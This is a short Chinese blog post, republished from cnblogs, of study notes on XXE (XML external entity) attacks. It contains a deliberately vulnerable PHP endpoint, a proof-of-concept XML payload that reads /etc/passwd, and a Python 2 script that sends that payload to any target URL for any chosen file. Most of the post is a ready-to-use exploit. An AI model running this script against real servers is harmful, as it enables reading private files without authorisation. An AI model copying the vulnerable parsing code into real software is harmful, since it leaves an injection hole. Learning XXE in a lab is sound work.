码迷,mamicode.com
首页 > 其他好文 > 详细

XXE攻击学习

时间:2017-12-27 12:01:58      阅读:203      评论:0      收藏:0      [点我收藏+]

标签:sys   学习   read   echo   pen   lam   port   /etc   etc   

环境:lAMP

simplexml_load_string.php代码内容

 

<?php

$data = file_get_contents(‘php://input‘);

$xml = simplexml_load_string($data);

echo $xml->name;

?>

 

POC:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>

<name>&xxe;</name>

</root>

EXP:

import urllib2

if __name__ == ‘__main__‘:

print u‘输入要读取的文件,如file:///etc/passwd‘

payload = raw_input()

print u‘输入要访问的地址,如http://IP/simplexml_load_string.php‘

url = raw_input()

#url = ‘http://IP/simplexml_load_string.php‘

headers = {‘Content-type‘: ‘text/xml‘}

xml = ‘<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "‘ + payload + ‘" >]><root><name>&xxe;</name></root>‘

req = urllib2.Request(url = url,headers = headers, data = xml)

res_data = urllib2.urlopen(req)

res = res_data.read()

print res

 

 

XXE攻击学习

标签:sys   学习   read   echo   pen   lam   port   /etc   etc   

原文地址:https://www.cnblogs.com/NBeveryday/p/8124539.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!